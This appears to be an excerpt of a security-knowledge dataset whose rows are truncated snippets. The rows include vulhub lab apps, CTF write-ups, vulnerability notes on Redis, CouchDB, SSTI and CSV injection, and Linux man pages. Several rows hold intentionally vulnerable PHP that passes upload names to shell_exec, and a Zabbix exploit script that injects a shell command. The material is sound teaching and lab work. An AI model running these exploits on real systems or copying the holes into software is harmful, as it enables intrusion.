text stringlengths 100 9.93M | category stringclasses 11
values |
|---|---|
<?php
error_reporting(0);
define('FROM_INDEX', 1);
$op = empty($_GET['op']) ? 'home' : $_GET['op'];
if(!is_string($op) || preg_match('/\.\./', $op))
die('hacker');
ob_start('ob_gzhandler');
function page_top($op) {
?><!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8">
<title>PixelShop :: <?= htmlentities(ucfir... | sec-knowleage |
# echooo
Binary Exploitation, 300 points
## Description:
> This program prints any input you give it. Can you leak the flag?
```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
int main(int argc, char **argv){
setvbuf(stdout, NULL, _IONBF, 0);
char buf[64];
c... | sec-knowleage |
DB_SECRET = "35C3_???"
DECRYPTED = "35C3_???"
DEV_NULL = "35C3_???"
LOCALHOST = "35C3_???"
LOGGED_IN = "35C3_???"
NOT_IMPLEMENTED = "35C3_???" | sec-knowleage |
# CouchDB未授权访问漏洞
## 漏洞描述
CouchDB因配置不当可以未授权访问,被攻击者恶意利用。
攻击者无需认证访问到内部数据,可能导致敏感信息泄露,黑客也可以恶意清空所有数据。
## 漏洞搭建
> https://github.com/vulhub/vulhub/blob/master/couchdb/CVE-2017-12636/README.zh-cn.md
使用docker-compose启动。
```bash
cd couchdb/CVE-2017-12636/
docker-compose up -d
```
## 漏洞利用
访问5984端口,就可以看到版本信息。

Apache Airflow is an open source, distributed task scheduling framework. Although authentication is not required by default, but the administration can specify the `webserver.authenticate=True` to enable it.
In the versi... | sec-knowleage |
binary = open('admin-tool', 'rb').read()
stream = open('stream.bin', 'rb').read()
def KSA(key):
keylength = len(key)
S = list(range(256))
j = 0
for i in range(256):
j = (j + S[i] + key[i % keylength]) % 256
S[i], S[j] = S[j], S[i] # swap
return S
def PRGA(S):
i = 0
j =... | sec-knowleage |
.TH quota 1 "Tue Jun 8 1993"
.SH NAME
quota \- 显示磁盘的使用和限额
.SH "总览 (SYNOPSIS)"
quota [
.B -guv | q
]
.br
quota [
.B -uv | q
] user
.br
quota [
.B -gv | q
] group
.SH "描述 (DESCRIPTION)"
.B Quota
显示 用户的 磁盘 使用情况 和 限额. 缺省功能 只显示 用户限额.
.LP
.TP
.B \-g
显示 用户所在组 的 组限额. 可选项(optional).
.TP
.B \-u
和 缺省情况 一样.
.TP
.B \-v
显示 文件系统上 的 限... | sec-knowleage |
# 元素与属性
## 元素
> 元素是 HTML 文档的基本单位
- 元素以开始标签起始
- 元素以结束标签终止
- 元素的内容是开始标签与结束标签之间的内容
- 某些元素具有空内容(empty content)
- 空元素在开始标签中进行关闭(以开始标签的结束而结束)
- 大多数元素可拥有属性
### 格式
> 元素 = 开始标签 + 内容 + 结束标签
<开始标签>受标签影响的内容</结束标签>
**小贴士**:自闭合标签比较特殊,它总是单独出现,以`/>`结尾
### HTML 空元素
1. 没有内容的 HTML 元素被称为空元素。空元素是在开始标签中关闭的
2. `<br>`就是没有关闭标签的空元素(`<br>`... | sec-knowleage |
fc
===
显示历史列表中的命令或修改指定的历史命令并执行。
## 概要
```shell
fc [-e ename] [-lnr] [first] [last]
fc -s [pat=rep] [command]
```
## 主要用途
- 显示历史列表中的命令。
- 编辑并重新执行历史列表的命令。
## 选项
```shell
-e ename 选择使用的编辑器,默认调用次序为环境变量`FCEDIT`、环境变量`EDITOR`、`vi`。
-l 列出而不是编辑。
-n 列出时不输出行号(需配合-l选项)... | sec-knowleage |
## Julian Cohen (recon, 100p, 883 solves)
### PL Version
`for ENG version scroll down`
Bardzo krótkie zadanie. Wyszukiwanie Juliana Cohena, zawężone do tematyki CTFów pozwala bardzo szybo trafić na jego twittera (@HockeyInJune) gdzie wprost umieścił flagę w jednym z wpisów `https://twitter.com/HockeyInJune/status/64171... | sec-knowleage |
# untrustworthy (pwn 451p, 3 solved)
> Don't trust everything you see. There are secrets hidden in plain sight.
## Exploitation
1. Spawn `worker` by calling `server.exe` API exposed via Microsoft RPC
2. Copy pre-existing `fail_plugin.dll` to a temporary (writable) file
3. Send `auth::PluginBasedAuth` request over `work... | sec-knowleage |
'\"
'\" Copyright (c) 1997 Sun Microsystems, Inc.
'\"
'\" See the file "license.terms" for information on usage and redistribution
'\" of this file, and for a DISCLAIMER OF ALL WARRANTIES.
'\"
'\" RCS: @(#) $Id: registry.n,v 1.2 2003/11/24 05:09:59 bbbush Exp $
'\"
'\" The definitions below are for supplemental macros... | sec-knowleage |
# Redis 4.x/5.x 主从复制导致的命令执行
Redis是著名的开源Key-Value数据库,其具备在沙箱中执行Lua脚本的能力。
Redis未授权访问在4.x/5.0.5以前版本下,我们可以使用master/slave模式加载远程模块,通过动态链接库的方式执行任意命令。
参考链接:
- <https://2018.zeronights.ru/wp-content/uploads/materials/15-redis-post-exploitation.pdf>
## 环境搭建
执行如下命令启动redis 4.0.14:
```
docker compose up -d
```
环境启动后,通过`redis... | sec-knowleage |
.\" DO NOT MODIFY THIS FILE! It was generated by help2man 1.48.5.
.\"*******************************************************************
.\"
.\" This file was generated with po4a. Translate the source file.
.\"
.\"*******************************************************************
.TH REALPATH 1 2022年9月 "GNU coreutils... | sec-knowleage |
declare
===
声明变量,设置或显示变量的值和属性。
## 语法
```shell
declare [-aAfFgilnrtux] [-p] [name[=value] ...]
```
## 主要用途
- 显示包含指定属性的全部变量和值
- 显示包含指定属性的一到多个变量和值
- 显示一到多个变量的属性和值
- 显示所有变量的属性和值并显示函数的定义
- 显示所有变量的属性和值
- 显示所有全局变量的属性和值
- 显示全部函数名和函数定义
- 只显示全部函数名
- 显示一到多个函数名和函数定义
- 只显示一到多个函数名
- 声明全局变量(可选:赋值)
- 声明变量(可选:赋值、属性)
- 增加、删除变量的属性(可选:赋值)... | sec-knowleage |
<?php
if(!empty($_FILES)) {
$filename = escapeshellarg($_FILES['file']['tmp_name']);
$newname = './' . uniqid() . '.mp4';
shell_exec("ffmpeg -i $filename $newname");
}
?>
<html>
<head>
<meta charset="utf-8">
<title>Video Player</title>
</head>
<body>
<?php if(!empty($_FILES)): ?>
<div>
... | sec-knowleage |
import sys
import socket
import json
import sys
def send(ip, data):
conn = socket.create_connection((ip, 10051), 10)
conn.send(json.dumps(data).encode())
data = conn.recv(2048)
conn.close()
return data
target = sys.argv[1]
print(send(target, {"request":"active checks","host":"vulhub","ip":";touc... | sec-knowleage |
<?php
$newname = '';
if (!empty($_FILES)) {
$ext = pathinfo($_FILES['file_upload']['name'], PATHINFO_EXTENSION);
if (!in_array($ext, ['gif', 'png', 'jpg', 'jpeg'])) {
die('Unsupported filetype uploaded.');
}
$newname = uniqid() . '.png';
shell_exec("convert -resize 50x50 {$_FILES['file_uplo... | sec-knowleage |
# 循环
---
- https://www.kancloud.cn/imxieke/ruby-base/107293
---
# 循环的基础
我们在编写程序时,常常遇到“希望这个处理重复执行多次”的情况。例如:
- 希望同样的处理执行 X 次
更复杂点的例子有:
- 用其他对象置换数组里的所有元素;
- 在达成某条件之前,一直重复执行处理。
这时,我们都需要用到循环。
接下来,我们将会介绍 Ruby 中基本的循环结构。其中比较特别的是,除了用传统的循环语句实现循环外,我们还能用方法来实现循环,也就是说我们可以根据自己的需要定制循环方法。
# 循环时的注意事项
下面两点是循环时必须注意的。
- 循环的主体是什么
- 停止循环的条件是... | sec-knowleage |
---
title: PostgreSQL
background: bg-[#3d6488]
tags:
- DB
- RDBMS
categories:
- Database
date: 2021-01-11 14:19:24
intro: |
The [PostgreSQL](https://www.postgresql.org/docs/current/) cheat sheet provides you with the common PostgreSQL commands and statements.
plugins:
- copyCode
---
Getting Started
--... | sec-knowleage |
.\" 本man页版权所有(C) 1999 Andi Kleen <ak@muc.de>.
.TH UNIX 7 "1999年5月7日" "Linux 手册页" "Linux程序员手册"
.SH NAME(名称)
unix, PF_UNIX, AF_UNIX, PF_LOCAL, AF_LOCAL \- 用于本地内部进程通讯的套接字。
.SH SYNOPSIS(总览)
.B #include <sys/socket.h>
.br
.B #include <sys/un.h>
.IB unix_socket " = socket(PF_UNIX, type, 0);"
.br
.IB error " = socketpair(PF_... | sec-knowleage |
<!-- markdown="1" is required for GitHub Pages to render the TOC properly. -->
<details markdown="1">
<summary>目录</summary>
- [1 JavaScript页面类](#1)
* [I. 代码实现](#1.1)
+ [1.1 原生DOM API的安全操作](#1.1.1)
+ [1.2 流行框架/库的安全操作](#1.1.2)
+ [1.3 页面重定向](#1.1.3)
+ [1.4 JSON解析/动态执行](#1.1.4)
+ [1.5 跨域通讯](#1... | sec-knowleage |
### SROP基本介绍
SROP(Sigreturn Oriented Programming)于2014年被Vrije Universiteit Amsterdam的Erik Bosman提出,其相关研究**`Framing Signals — A Return to Portable Shellcode`**发表在安全顶级会议[Oakland 2014](http://www.ieee-security.org/TC/SP2014)上,被评选为当年的[Best Student Papers](http://www.ieee-security.org/TC/SP2014/awards.html)。其中相关的paper以及slid... | sec-knowleage |
# ThinkPHP Lang Local File Inclusion
[中文版本(Chinese version)](README.zh-cn.md)
ThinkPHP is an extremely widely used PHP development framework in China. In the version prior to 6.0.13, a local restricted file inclusion issue exists in `lang` parameter if the developer enable multiple language pack.
Although this issue... | sec-knowleage |
# CSV Injection
Many web applications allow the user to download content such as templates for invoices or user settings to a CSV file. Many users choose to open the CSV file in either Excel, Libre Office or Open Office. When a web application does not properly validate the contents of the CSV file, it could lead to co... | sec-knowleage |
## zerodaystore (misc, 200)
tldr; Add &price=0 to the end of the /pay request
[server.py](server.py.8c15b34d5e32243f5ed38c1b055bfd6f)
[zerodaystore.apk](zerodaystore.apk.7869c5b00cdf037273e39572fb1affdb)
We start off by decompiling the apk file using [javadecompilers](http://www.javadecompilers.com/apk). The code is p... | sec-knowleage |
import urllib
from PIL import Image
import io
from pytesseract import pytesseract
import urllib2
import re
def get_filling(pixels, i, j, best_colors, x_range):
left = pixels[(i - 1) % x_range, j]
right = pixels[(i + 1) % x_range, j]
if left in best_colors and left != best_colors[0]:
return left
... | sec-knowleage |
# JSON
---
通过 Jackson 解析 json
Maven依赖
```xml
<dependency>
<groupId>com.fasterxml.jackson.core</groupId>
<artifactId>jackson-databind</artifactId>
<version>2.10.0</version>
</dependency>
```
使用下面的代码解析一个 JSON 文件
```java
InputStream input = Main.class.getResourceAsStream("/book.json");
ObjectMapper mapper = n... | sec-knowleage |
# Git 学习笔记
<p align="center">
<a href="http://turnoff.us/geek/when-ai-meets-git/"><img src="../../../assets/img/banner/ai-meets-git.jpg" width="65%"></a>
</p>
---
## 大纲
* **[原理](#原理)**
* **[基本操作](#基本操作)**
* [分支管理](#分支管理)
* [标签管理](#标签管理)
* [忽略文件](#忽略文件)
* [别名](#别名)
* [撤销Git操作](#撤销git操作)
* [跳转... | sec-knowleage |
.\" DO NOT MODIFY THIS FILE! It was generated by help2man 1.48.5.
.\"*******************************************************************
.\"
.\" This file was generated with po4a. Translate the source file.
.\"
.\"*******************************************************************
.TH GROUPS 1 2022年9月 "GNU coreutils 9... | sec-knowleage |
# Protocol - Exploits
`注:本分类里内容并非全是协议的 bug,部分 "基于、使用" 这个协议的应用所存在的漏洞也算在其中,例如 dns 域传送漏洞,其并非 dns 协议本身的漏洞,为服务部署时的配置问题,但应用与 DNS 相关的业务,故此分类`
`补充和相关协议有关的知识点,不知道怎么分类,就放到这个部分了,例如:ja3,Shadow-TLS`
---
## 免责声明
`本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关.`
---
## 大纲
* [DNS](#dns)
* [ipv6](#ipv6)
* [LDAP](#ldap)
* [RTSP](#rts... | sec-knowleage |
.TH query_module 2
.SH NAME
query_module \- 向内核查询和模块有关的各个位. /* 查询有关的位?? */
.SH 总览
.B #include <linux/module.h>
.sp
int query_module(const char *name, int which,void *buf, size_t bufsize, size
_t *ret);
.SH 描述
query_module请求和可加载模块有关的来自内核的信息.信息的细致的特性和格式依赖于
which参数,一些函数要求name参数来命名当前被加载的模块.一些允许参数name为null,
指明内核是正确的.:
wh... | sec-knowleage |
# Hash Attack
常见的Hash函数的攻击方法主要有
- 暴力攻击:不依赖于任何算法细节,仅与Hash值长度有关;
- 生日攻击法(Birthday Attack):没有利用Hash函数的结构和任何代数弱性质,只依赖于消息摘要的长度,即Hash值的长度。
- 中点交会攻击法(Meet-In-The-Middle):是生日攻击的一种变形,不比较Hash值,而是比较中间变量。这种攻击主要适用于攻击具有分组链结构的Hash方案。
- 密码分析:依赖于具体算法的设计缺点。
## 暴力攻击
**HashCat 工具** 可以说是目前最好的基于 CPU 和 GPU 破解 Hash 的软件,相关链接如下
[HashCat ... | sec-knowleage |
# MeterSphere 插件接口未授权访问及远程代码执行
MeterSphere是基于GPLv3协议的一站式的开源持续测试平台。在其1.16.3版本及以前,插件相关管理功能未授权访问,导致攻击者可以通过上传插件的方式在服务器中执行任意代码。
参考连接:
- <https://xz.aliyun.com/t/10772>
## 漏洞环境
执行如下命令启动一个MeterSphere 1.16.3服务器:
```
docker compose up -d
```
MeterSphere初始化成功后,访问`http://your-ip:8081`即可跳转到默认登录页面。
## 漏洞复现
首先,我们访问`http://y... | sec-knowleage |
'\"
'\" Copyright (c) 1993 The Regents of the University of California.
'\" Copyright (c) 1994-1996 Sun Microsystems, Inc.
'\"
'\" See the file "license.terms" for information on usage and redistribution
'\" of this file, and for a DISCLAIMER OF ALL WARRANTIES.
'\"
'\" RCS: @(#) $Id: eof.n,v 1.2 2003/11/24 05:09:59 bb... | sec-knowleage |
# 黑灰产整治法规政策
此处记录各个国家、相关部门对黑灰产发起的整治活动。
## 法规
- 中国刑法第七条和第三百零三条
## 政策
### 2019年
- > 2019年8月18日柬埔寨总理洪森签发政令,即日起禁止颁发各种形式的网络赌博执照,全面整顿网络博彩业同时配合中国公安发起的“云剑”、“净网”、“长城二号”等多项行动,一时间菜农们人心惶惶,大量菜农纷纷逃离西港,有的回国,有的选择投奔隔壁菲律宾。
>
> https://ti.qianxin.com/blog/articles/southeast-asian-gaming-industry-research-report/ | sec-knowleage |
<?php
if (!empty($_FILES)):
$ext = pathinfo($_FILES['file_upload']['name'], PATHINFO_EXTENSION);
if (in_array($ext, ['php'])) {
die('Unsupported filetype uploaded.');
}
move_uploaded_file($_FILES['file_upload']['tmp_name'], './' . $_FILES['file_upload']['name']);
echo "<a href='/{$_FILES['file_upload']['name']}'>{... | sec-knowleage |
# 二十一、工具
+ [Burp Suite](https://portswigger.net/burp)
+ [Knockpy](https://github.com/guelfoweb/knock)
+ [HostileSubBruteforcer](https://github.com/nahamsec/HostileSubBruteforcer)
+ [sqlmap](http://sqlmap.org)
+ [Nmap](https://nmap.org)
+ [Eyewitness](https://github.com/ChrisTruncer/EyeWitness)
+ [Shodan](https://www.sh... | sec-knowleage |
package org.vulhub.shirodemo;
import org.springframework.boot.SpringApplication;
import org.springframework.boot.autoconfigure.SpringBootApplication;
@SpringBootApplication
public class ShirodemoApplication {
public static void main(String[] args) {
SpringApplication.run(ShirodemoApplication.class, args)... | sec-knowleage |
# 堆溢出
## 介绍
堆溢出是指程序向某个堆块中写入的字节数超过了堆块本身可使用的字节数(**之所以是可使用而不是用户申请的字节数,是因为堆管理器会对用户所申请的字节数进行调整,这也导致可利用的字节数都不小于用户申请的字节数**),因而导致了数据溢出,并覆盖到**物理相邻的高地址**的下一个堆块。
不难发现,堆溢出漏洞发生的基本前提是
- 程序向堆上写入数据。
- 写入的数据大小没有被良好地控制。
对于攻击者来说,堆溢出漏洞轻则可以使得程序崩溃,重则可以使得攻击者控制程序执行流程。
堆溢出是一种特定的缓冲区溢出(还有栈溢出, bss 段溢出等)。但是其与栈溢出所不同的是,堆上并不存在返回地址等可以让攻击者直接控制执行流程的数据,因... | sec-knowleage |
# Heathrow - Secret Warehouse
Category: Pwn
## Description
> Wow, it’s a crowded day at Heathrow, lots of suits that bump into each other and try to catch their plane. You have to find the gate to the secret warehouse, it cannot be far away. You see a suspicious suit go into a fast food court and you spot him disappear... | sec-knowleage |
.\" -*- nroff -*-
.\" Copyright (C) 1998, 1999 Thorsten Kukuk
.\" This file is part of the yp-tools.
.\" Author: Thorsten Kukuk <kukuk@suse.de>
.\"
.\" This program is free software; you can redistribute it and/or modify
.\" it under the terms of the GNU General Public License as published by
.\" the Free Software Foun... | sec-knowleage |
# 主机安全扫描
针对主机安全扫描主要包括:端口开放扫描与访问控制扫描、漏洞扫描与弱口令扫描。
针对企业内部安全扫描应该分为两种类型:内部扫描与外部扫描,这里的内化划分应该是网络分界的划分;内部扫描主要用于发现内部的安全隐患,外部扫描主要是站在攻击者的角度发现安全隐患。
## 端口扫描
端口扫描应该包括:操作系统信息扫描、端口开放扫描、服务探测(服务版本信息)等等。
### 端口扫描的思路
* 端口开放扫描:全端口扫描,快速扫描;
* 端口服务信息扫描:开放端口扫描,慢速扫描;
利用工具进行扫描的思路:
```
1.利用masscan进行全端口存活性扫描,由于masscan扫描可能不精准,可以扫描两次做并集操作;
2.利用nmap对... | sec-knowleage |
# 流量包分析简介
CTF 比赛中,流量包的取证分析是另一项重要的考察方向。
通常比赛中会提供一个包含流量数据的 PCAP 文件,有时候也会需要选手们先进行修复或重构传输文件后,再进行分析。
PCAP 这一块作为重点考察方向,复杂的地方在于数据包里充满着大量无关的流量信息,因此如何分类和过滤数据是参赛者需要完成的工作。
总的来说有以下几个步骤
- 总体把握
- 协议分级
- 端点统计
- 过滤赛选
- 过滤语法
- Host,Protocol,contains,特征值
- 发现异常
- 特殊字符串
- 协议某字段
- flag 位于服务器中
- 数据提取
- 字符串取
... | sec-knowleage |
# Server Side Template Injection
> Template injection allows an attacker to include template code into an existing (or not) template. A template engine makes designing HTML pages easier by using static template files which at runtime replaces variables/placeholders with actual values in the HTML pages
## Summary
- [Tem... | sec-knowleage |
# Encoding 类
---
- https://www.kancloud.cn/imxieke/ruby-base/107307
---
# Ruby 的编码与字符串
字符编码是计算机进行字符操作的基础,字符编码有多种,而且即使是在同一个程序中,有时候输入 / 输出的字符编码也有可能不一样。例如程序输入是 `UTF-8` 字符编码,而输出却是 `Shift_JIS` 字符编码等情况。虽然“あ”的 `UTF-8` 的字符编码与 `Shift_JIS` 的字符编码实际上是不同的,但经过适当的转换,也是可以编写这样的程序的。
至于程序如何处理字符编码,不同的编程语言有不同的解决方案。Ruby 的每个字符串对象都包含“字符串数据本身”... | sec-knowleage |
# Moscow - Apartment
Category: Misc.
## Description
> It’s a cold day, and the snow is falling horizontally. It pierces your sight. You better use those extra pairs of socks that you were strangely given by the driver. Someone is waving on the other side of the street. You walk over to her. "Hi AGENT, I’m AGENT X, we’... | sec-knowleage |
login
===
登录系统或切换用户身份
## 补充说明
**login命令** 用于给出登录界面,可用于重新登录或者切换用户身份,也可通过它的功能随时更换登入身份。在Slackware发行版中 ,您可在命令后面附加欲登入的用户名称,它会直接询问密码,等待用户输入。当`/etc/nologin`文件存在时,系统只root帐号登入系统,其他用户一律不准登入。
### 语法
```shell
login(选项)(参数)
```
### 选项
```shell
-p:告诉login指令不销毁环境变量;
-h:指定远程服务器的主机名。
```
### 参数
用户名:指定登录使用的用户名。 | sec-knowleage |
# Windows 故障转移集群
---
**搭建**
这篇百度文库的文档写的相当详细具体,我觉得没有必要重复写一遍,https://wenku.baidu.com/view/4646e1b4866fb84ae45c8dd3.html ,虽然是基于 2008R2,版本有点老,但是还是推荐
**群集节点的删除**
一般情况下,Windows 群集可以在群集管理器中,使用功能菜单的"退出节点"来删除一个群集节点,但有时这个功能是不可用的,这种情况下,如果要从群集中删除一个叫 SecondNode 的节点,使用的命令是:
`cluster node SecondNode /force`
这个命令执行之后,群集管理器中"退出节点"的功能就可... | sec-knowleage |
---
title: 列出弹性计算服务
---
::: warning 注意
* 为了提高程序运行速度,当获取一次结果后,获取的结果会缓存下来,缓存文件为 `~/.config/cf/cache.db`
* 如果不想使用缓存数据,可以在执行命令的时候加上 `--flushCache` 参数
:::
## 列出阿里云的弹性计算服务
使用以下命令列出 ECS 弹性计算服务
```bash
cf alibaba ecs ls
```
如果想指定区域,可以使用 `-r` 或者 `--region` 参数
```bash
cf alibaba ecs ls -r cn-beijing
```
如果想指定实例,可以使用 `-i` 或者 `--i... | sec-knowleage |
# Android 关键代码定位
AndroidManifest.xml文件
- 软件包名
- apk主活动,隐藏程序没有主Activity
Application在 java层启动最早,
## 顺序分析
最常见也是最有用的方法就是,我们顺着程序的逻辑依次查看程序的代码来进行分析,但是当程序代码量特别大时候,这一方法的效率就比较低下,需要其他方法来辅助。
## 字符串定位法
所谓字符串定位法就是通过在程序程序运行过程中出现的字符串来定位相应的函数。字符串有可能被直接硬编码在程序中,也有可能通过字符串id来索引。这一方法故去使用比较方便,但现在的话,有可能字符串会被分开或者说首先被加密,在运行的过程中被动态解密。
我们可能关注的字符串... | sec-knowleage |
# Challenge 1
Worked with AvivC, YaakovC.
## Description
After entering the challenge, we arrive to a Kibana dashboard with the following description:
> The windows 10 user at 13.89.33.39 was attacked on February 5th. Find out what happened and help him revert the damage!
## Logs
The dashboard links to a series of 69 e... | sec-knowleage |
# HITCON 2017 Quals
Team: nazywam, ppr, msm, c7f.m0d3, akrasuski1, rev, shalom
### Table of contents
* [Secret server (crypto)](secret_server)
* [Data & Mining (forensics)](data_mining) | sec-knowleage |
# Kubernetes Api Server 未授权访问
## 漏洞描述
Kubernetes 的服务在正常启动后会开启两个端口:Localhost Port (默认8080)、Secure Port (默认6443)。这两个端口都是提供 Api Server 服务的,一个可以直接通过 Web 访问,另一个可以通过 kubectl 客户端进行调用。如果运维人员没有合理的配置验证和权限,那么攻击者就可以通过这两个接口去获取容器的权限。
## 环境搭建
> ubuntu 18.04
下载
```
wget https://github.com/kubernetes/minikube/releases/download/v1.18.1/... | sec-knowleage |
nl
===
为每一个文件添加行号。
## 概要
```shell
nl [OPTION]... [FILE]...
```
## 主要用途
- 将每一个输入的文件添加行号后发送到标准输出。
- 当没有文件或文件为`-`时,读取标准输入
- 处理逻辑页(logical page)。
## 选项
```shell
-b, --body-numbering=STYLE 使用STYLE 为body部分的行附加行号。
-d, --section-delimiter=CC 使用CC作为logical page的分隔符。
-f, --footer-numbering=STYLE 使用STY... | sec-knowleage |
### Reference
[实用性开发人员安全须知](https://github.com/FallibleInc/security-guide-for-developers/blob/master/security-checklist-zh.md)
##### 权限系统 (注册/注册/二次验证/密码重置)
- [ ] 任何地方都使用 HTTPS.
- [ ] 使用 `Bcrypt` 存储密码哈希 (没有使用盐的必要 - `Bcrypt` 干的就是这个事).
- [ ] `登出`之后销毁会话 ID .
- [ ] 密码重置后销毁所有活跃的会话.
- [ ] OAuth2 验证必须包含 `state` 参数.
- [ ]... | sec-knowleage |
.\" auto-generated by docbook2man-spec $Revision: 1.1 $
.TH "LISTEN" "7" "2003-11-02" "SQL - Language Statements" "SQL Commands"
.SH NAME
LISTEN \- 监听一个通知
.SH SYNOPSIS
.sp
.nf
LISTEN \fIname\fR
.sp
.fi
.SH "DESCRIPTION 描述"
.PP
\fBLISTEN\fR 将当前会话注册为通知条件 name
.PP
当执行了命令 NOTIFY name 后,不管是此会话还是其他联接到同一数据库的会话执行的, 所有正在监听此通知... | sec-knowleage |
version: '2'
services:
web:
image: vulhub/ghostscript:9.23-with-flask
command: python app.py
volumes:
- ./app.py:/usr/src/app.py
ports:
- "8000:8000" | sec-knowleage |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import operator
import sys
class Calculator(object):
"""
+-------------------------------------------------------------------------+
| This is a calculator that takes expressions in reverse polish notation. |
| ... | sec-knowleage |
# T1069-001-win-AD特权组/用户枚举
## 来自ATT&CK的描述
攻击者可能会尝试查找本地系统组和权限设置。本地系统权限组的知识可以帮助攻击者确定存在哪些组以及哪些用户属于特定组。攻击者可以使用此信息来确定哪些用户具有较高的权限,例如在本地管理员组中找到的用户。
在Windows操作系统上可以使用net group /domain命令进行查找,在Mac操作系统上使用dscacheutil -q group命令、Linux上可以使用ldapsearch命令查找。
## 测试案例
在侦察阶段检测到攻击者非常重要,因为如果攻击者正处于此阶段,则意味着已经绕过了所有外围设备和安全防护阶段。Microsoft Net.exe... | sec-knowleage |
# Puzzle (re, 126p)
In the challenge we get to play a simple sliding puzzle game.
It's a browser game so we can get the [game script](main.dart.js).
It seems to be transpiled dart code to JS, which makes lots of code to look at.
However once you look closely, most of the code doesn't really do anything useful, some sta... | sec-knowleage |
# 工作组
---
**工作组的定义**
工作组是局域网中的一个概念,它是最常见的资源管理模式,简单是因为默认情况下计算机都是采用工作组方式进行资源管理的。将不同的电脑按功能分别列入不同的组中,以方便管理。默认情况下所有计算机都处在名为 WORKGROUP 的工作组中,工作组资源管理模式适合于网络中计算机不多,对管理要求不严格的情况。它的建立步骤简单,使用起来也很好上手。大部分中小公司都采取工作组的方式对资源进行权限分配和目录共享。相同组中的不同用户通过对方主机的用户名和密码可以查看对方共享的文件夹,默认共享的是 Users 目录。不同组的不同用户通过对方主机的用户名和密码也可以查看对方共享的文件夹。所以工作组并不存在真正的集中管理... | sec-knowleage |
# Redis未授权访问漏洞
## 简介
redis是一个开源的存储系统,支持数据的持久化存储、支持key-value、list、set等数据结构存储,支持备份。
但若redis存在未授权访问,就会导致攻击者可以无需认证就能访问redis内部资源,获取敏感文件,甚至执行flushall清空数据,给root账户写入ssh公钥直接远程登录目的服务器。
## 环境搭建
```
wget https://download.redis.io/releases/redis-5.0.14.tar.gz
tar xvf redis-5.0.14.tar.gz
cd redis-5.0.14
make -j 4
make install
```
直... | sec-knowleage |
### [第二十一课:基于ICMP发现内网存活主机](../Chapter1/21-30/21_基于ICMP发现内网存活主机.md)
### [第二十二课:基于SMB发现内网存活主机](../Chapter1/21-30/22_基于SMB发现内网存活主机.md)
### [第二十三课:基于MSF发现内网存活主机第一季](../Chapter1/21-30/23_基于MSF发现内网存活主机第一季.md)
### [第二十四课:基于MSF发现内网存活主机第二季](../Chapter1/21-30/24_基于MSF发现内网存活主机第二季.md)
### [第二十五课:基于MSF发现内网存活主机第三季 ](../Chapt... | sec-knowleage |
# Beginners Luck (crypto)
```
Derp just had his first class of cryptography, and he feels really confident about his skills in this field. Can you break his algorithm and get the flag?
```
###ENG
[PL](#pl-version)
In the task we get [encryption algorithm](enc27.py) and [encrypted flag](BITSCTFfullhd.png).
The algorithm... | sec-knowleage |
telinit
===
切换当前正在运行系统的运行等级
## 补充说明
**telinit命令** 用于切换当前正在运行的Linux系统的运行等级。
_RUNLEVEL_ 参数应该是多用户运行级别 `2-5` 之一,`0` 用于停止系统,`6` 用于重新启动系统,或 `1` 用于使系统进入单用户模式。
通常您会使用 `shutdown(8)` 工具来停止或重新启动系统,或者将其降低到单用户模式。
_RUNLEVEL_ 也可能是 S 或 s ,这会将系统直接置于单用户模式,而无需先实际停止进程,您可能不希望这样。
通过发出 `runlevel(7)` 事件来更改运行级别,该事件包括 _RUNLEVEL_ 环境变量中的新运行级别以及 P... | sec-knowleage |
'\" t
.\" Don't change the first line, it tells man that tbl is needed.
.\" This man page is Copyright (C) 1999 Andi Kleen <ak@muc.de>.
.\" Permission is granted to distribute possibly modified copies
.\" of this page provided the header is included verbatim,
.\" and in case of nontrivial modification author and date
.... | sec-knowleage |
'\"
'\" Copyright (c) 1993 The Regents of the University of California.
'\" Copyright (c) 1994-1996 Sun Microsystems, Inc.
'\"
'\" See the file "license.terms" for information on usage and redistribution
'\" of this file, and for a DISCLAIMER OF ALL WARRANTIES.
'\"
'\" RCS: @(#) $Id: trace.n,v 1.2 2003/11/24 05:10:00 ... | sec-knowleage |
### [第六十一课:高级持续渗透-第五季关于后门](../Chapter1/61-70/61_高级持续渗透-第五季关于后门.md)
### [第六十二课:高级持续渗透-第六季关于后门](../Chapter1/61-70/62_高级持续渗透-第六季关于后门.md)
### [第六十三课:高级持续渗透-第七季demo的成长](../Chapter1/61-70/63_高级持续渗透-第七季demo的成长.md)
### [第六十四课:高级持续渗透-第八季demo便是远控](../Chapter1/61-70/64_高级持续渗透-第八季demo便是远控.md)
### [第六十五课:离线提取目标机hash补充](../C... | sec-knowleage |
# 算法 - 排序
## 约定
待排序的元素需要实现 Java 的 Comparable 接口,该接口有 compareTo() 方法,可以用它来判断两个元素的大小关系。
使用辅助函数 less() 和 swap() 来进行比较和交换的操作,使得代码的可读性和可移植性更好。
排序算法的成本模型是比较和交换的次数。
```java
public abstract class Sort<T extends Comparable<T>> {
public abstract void sort(T[] nums);
protected boolean less(T v, T w) {
return v.com... | sec-knowleage |
import sys
import matplotlib.pyplot as plt
# http://atariage.com/forums/topic/188172-pokey-keyboard-codes/
keys = {
63: "A",
62: "S",
61: "G",
60: "Cap",
58: "D",
57: "H",
56: "F",
55: "Great",
54: "Less",
53: "8",
52: "BSp",
51: "7",
50: "0",
48: "9",
47: "Q... | sec-knowleage |
原文 by [tsrc](https://security.tencent.com/index.php/blog/msg/19)
## 一、变形webshell
webshell比如eval($_POST[])大家都耳熟能详,近几年在常见的webshell基础上衍生了很多变种,加大了检测难度,下面先看几个从网上摘取的样本:
### 1、无ascii码和数字的webshell

### 2、隐藏关键字

### 3、编码 + 隐藏关键字

* [一、性能](#一性能)
* [二、伸缩性](#二伸缩性)
* [三、扩展性](#三扩展性)
* [四、可用性](#四可用性)
* [五、安全性](#五安全性)
* [参考资料](#参考资料)
<!-- GFM-TOC -->
## 一、性能
### 性能指标
#### 1. 响应时间
指某个请求从发出到接收到响应消耗的时间。
在对响应时间进行测试时,通常采用重复请求的方式,然后计算平均响应时间。
#### 2. 吞吐量
指系统在单位时间内可以处理的请求数量,通常使用每秒的请求数来衡量。
#... | sec-knowleage |
a=[]
for i in range(30):
a.append([])
data=open("out").readlines()
mx=0
for line in data:
if line.strip()=="":
break
num=int(line.split("(")[1].split(")")[0])
line=line.split(") for ")[1]
a[num].append(line.strip())
if len(a[num])>mx:
